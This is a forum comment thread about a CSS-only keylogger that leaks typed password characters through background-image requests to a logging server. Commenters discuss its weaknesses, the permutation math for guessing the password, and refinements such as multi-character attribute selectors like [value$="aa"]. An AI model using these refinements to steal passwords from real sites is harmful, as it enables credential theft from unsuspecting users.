Not an efficient keylogger, however, if you know the pressed keys, you can just generate permutations ordered using probabilities, and that would be a lot faster than brute force.

The real deal here is, it depends on some js code updating the dom for each key press, which is BAAAD. Not an useless keylogger, because it reminds a vulnerability product of choosing a bad decision.

Interestingly the password "BAAAD" would generate 3 requests to the logging server, since it wouldn't request the background image for the letter "A" more than one time. Or shouldn't, anyway.

That depends on cache headers sent from the server, which the attacker controls

> it depends on some js code updating the dom for each key press

Like React with JSX?

It may be easier to XSS CSS than JS.

Even if the attacker got them out of order, it would let them be able to brute force guess in a small number of attempts.

For example, there are about 41,000 possible passwords for a given set of 8 characters, out of around 96^8 possible 8 character passwords (in the ASCII character set).

And if any of those are words or almost words, you'd guess that first and probably have it.

Where does 41000 come from?

It's 8! (8 factorial) which is 40320.

This is 127,286,426,869 (~128bn) times smaller than 92^8.

Edit: Note that if you have a repeated character in your 8 charcter password then the number of permutations of the set of 8 (7 distinct) characters is further halved to 20,160.

And just by doubling the amount of selectors you could always check for a repeated character! (AKA [value$=aa], [value$=bb], etc...)

Well it would also not come in the correct order if someone types their password wrong, deletes letters and re-types them, etc. But I assume the idea would be that you'd have a much easier time figuring out the password if you had all the keys they pressed.

You can just add the two (or more) letter permutations to the CSS to help to identify the previous characters. ( like [value$="aa"] )

Or the user corrects a typo by moving the cursor or using backspace. However I think the idea is that the keylogger will work on some or most users.

It'd be simple enough to add an 'order' identifier (request timestamp, etc) to the requests.

Edit: nm. My mistake, not as easy as that using only css!

Simple enough, in CSS?

My mistake, I guess I didn't really think that through...

Maybe with counter-reset?

Why would you even need an order identifier? All you need to do is check the request logs for your server everything should be already in order.

I was replying to the comment above which pointed out correctly that the order in which the server receives the requests may differ from the order in which they were sent.